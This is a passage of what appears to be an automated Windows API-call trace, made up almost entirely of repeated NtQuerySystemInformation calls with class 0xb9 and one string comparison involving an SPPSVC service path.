ResultLength=0x0) [0184.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff758, Length=0x28, ResultLength=0x0) [0184.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff758, Length=0x28, ResultLength=0x0) [0184.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x50, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0184.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0184.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff150, Length=0x50, ResultLength=0x0) [0184.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0184.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef20, Length=0x28, ResultLength=0x0) [0184.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0184.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0184.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0184.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x20, ResultLength=0x0) [0184.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedc0, Length=0x20, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff080, Length=0x38, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2e0, Length=0x50, ResultLength=0x0) [0184.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2e0, Length=0x50, ResultLength=0x0) [0184.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2e0, Length=0x50, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0184.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0184.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x20, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x20, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2e0, Length=0x50, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2e0, Length=0x50, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2e0, Length=0x50, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1d0, Length=0x50, ResultLength=0x0) [0184.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0184.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fefa0, Length=0x28, ResultLength=0x0) [0184.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0184.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x28, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef00, Length=0x20, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff100, Length=0x38, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef80, Length=0x20, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x20, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef10, Length=0x20, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff310, Length=0x28, ResultLength=0x0) [0184.446] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff390, Length=0x50, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x28, ResultLength=0x0) [0184.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff160, Length=0x28, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x28, ResultLength=0x0) [0184.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1e0, Length=0x28, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff2c0, Length=0x38, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff140, Length=0x20, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c0, Length=0x20, ResultLength=0x0) [0184.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0184.618] 